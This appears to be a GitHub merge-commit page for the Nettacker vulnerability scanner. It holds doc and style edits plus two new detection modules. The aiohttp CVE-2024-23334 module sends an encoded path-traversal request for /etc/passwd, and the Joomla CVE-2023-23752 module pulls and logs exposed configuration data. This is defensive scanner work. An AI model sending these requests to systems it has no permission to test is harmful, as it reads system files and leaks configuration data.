Skip to content

Commit 1494bcb

Browse files
authored
Merge branch 'master' into apsw-with-sqlalchemy
Signed-off-by: Achintya Jai <153343775+pUrGe12@users.noreply.github.com>
2 parents 6924186 + 915f760 commit 1494bcb

21 files changed

+304
-219
lines changed

AGENTS.md

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ See https://agents.md for more info
1919
- Docker (web UI): `docker-compose up`.
2020

2121
## Coding Style & Naming Conventions
22-
- Python 3.9–3.12 supported. Use 4-space indents.
22+
- Python 3.10–3.12 supported. Use 4-space indents.
2323
- Line length: 99 chars (`ruff`, `ruff-format`, `isort` profile=black).
2424
- Names: modules/files `lower_snake_case`; functions/vars `lower_snake_case`; classes `PascalCase`; constants `UPPER_SNAKE_CASE`.
2525
- Keep functions small, typed where practical, and add docstrings for public APIs.
@@ -32,6 +32,8 @@ See https://agents.md for more info
3232

3333
## Commit & Pull Request Guidelines
3434
- Commit messages: imperative tense, concise subject; reference issues (`Fixes #123`).
35+
- Commit signing: all commits must be signed.
36+
- Formatting: use Ruff for Python linting and formatting.
3537
- Before pushing: `pre-commit run --all-files` and `make test` must pass.
3638
- PRs: include a clear description, rationale, linked issue(s), test evidence (logs or screenshots for web UI), and update docs if behavior changes.
3739

docs/Modules.md

Lines changed: 163 additions & 163 deletions
Large diffs are not rendered by default.
Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
info:
2+
name: aiohttp_cve_2024_23334_vuln
3+
author: Sankalp Bansal
4+
severity: 7.5
5+
description: aiohttp Directory Traversal (CVE-2024-23334) allowing arbitrary file read in versions 1.0.5 < v < 3.9.2
6+
references:
7+
- https://nvd.nist.gov/vuln/detail/cve-2024-23334
8+
- https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f
9+
profiles:
10+
- vuln
11+
- http
12+
- high_severity
13+
- cve
14+
- cve2024
15+
- aiohttp
16+
17+
payloads:
18+
- library: http
19+
steps:
20+
- method: get
21+
timeout: 3
22+
headers:
23+
User-Agent: "{user_agent}"
24+
ssl: false
25+
url:
26+
nettacker_fuzzer:
27+
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
28+
prefix: ""
29+
suffix: ""
30+
interceptors:
31+
data:
32+
schema:
33+
- "http"
34+
- "https"
35+
ports:
36+
- 80
37+
- 443
38+
paths:
39+
- "assets"
40+
- "images"
41+
- "public"
42+
- "resources"
43+
- "static"
44+
- "media"
45+
- "uploads"
46+
- "build"
47+
response:
48+
condition_type: and
49+
conditions:
50+
status_code:
51+
regex: "200"
52+
reverse: false
53+
content:
54+
regex: "root:.*:0:0:"
55+
reverse: false

nettacker/modules/vuln/citrix_cve_2023_4966.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -47,7 +47,7 @@ payloads:
4747
content:
4848
regex: "\"issuer\":"
4949
reverse: false
50-
header:
50+
headers:
5151
Content-type:
5252
regex: application/json
5353
reverse: false

nettacker/modules/vuln/cloudron_cve_2021_40868.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -43,7 +43,7 @@ payloads:
4343
status_code:
4444
regex: '200'
4545
reverse: false
46-
header:
46+
headers:
4747
Content-type:
4848
regex: text/html
4949
reverse: false

nettacker/modules/vuln/cyberoam_netgenie_cve_2021_38702.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -43,7 +43,7 @@ payloads:
4343
status_code:
4444
regex: '200'
4545
reverse: false
46-
header:
46+
headers:
4747
Content-type:
4848
regex: text/html
4949
reverse: false

nettacker/modules/vuln/hoteldruid_cve_2021-37833.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -49,7 +49,7 @@ payloads:
4949
status_code:
5050
regex: '200'
5151
reverse: false
52-
header:
52+
headers:
5353
Content-type:
5454
regex: text/html
5555
reverse: false
Lines changed: 53 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,53 @@
1+
info:
2+
name: joomla_cve_2023_23752_vuln
3+
author: janpreet
4+
severity: 5.3
5+
description: Joomla! CVE-2023-23752 - Unauthenticated information disclosure vulnerability allows attackers to access application configuration data through exposed REST API endpoints. Affected versions range from 4.0.0 to < 4.2.8
6+
reference:
7+
- https://nvd.nist.gov/vuln/detail/CVE-2023-23752
8+
- https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
9+
profiles:
10+
- vuln
11+
- http
12+
- medium_severity
13+
- cve
14+
- cve2023
15+
- joomla
16+
17+
payloads:
18+
- library: http
19+
steps:
20+
- method: get
21+
timeout: 3
22+
headers:
23+
User-Agent: "{user_agent}"
24+
allow_redirects: false
25+
ssl: false
26+
url:
27+
nettacker_fuzzer:
28+
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
29+
prefix: ""
30+
suffix: ""
31+
interceptors:
32+
data:
33+
paths:
34+
- api/index.php/v1/config/application?public=true
35+
- api/v1/config/application?public=true
36+
schema:
37+
- http
38+
- https
39+
ports:
40+
- 80
41+
- 443
42+
- 8080
43+
- 8443
44+
response:
45+
condition_type: and
46+
conditions:
47+
status_code:
48+
regex: "200"
49+
reverse: false
50+
content:
51+
regex: "links.*data.*attributes"
52+
reverse: false
53+
log: "response_dependent['content']"

nettacker/modules/vuln/justwirting_cve_2021_41878.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -43,7 +43,7 @@ payloads:
4343
status_code:
4444
regex: '200'
4545
reverse: false
46-
header:
46+
headers:
4747
Content-type:
4848
regex: text/html
4949
reverse: false

nettacker/modules/vuln/maxsite_cms_cve_2021_35265.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -47,7 +47,7 @@ payloads:
4747
status_code:
4848
regex: '200'
4949
reverse: false
50-
header:
50+
headers:
5151
Content-type:
5252
regex: text/html
5353
reverse: false

0 commit comments

Comments
 (0)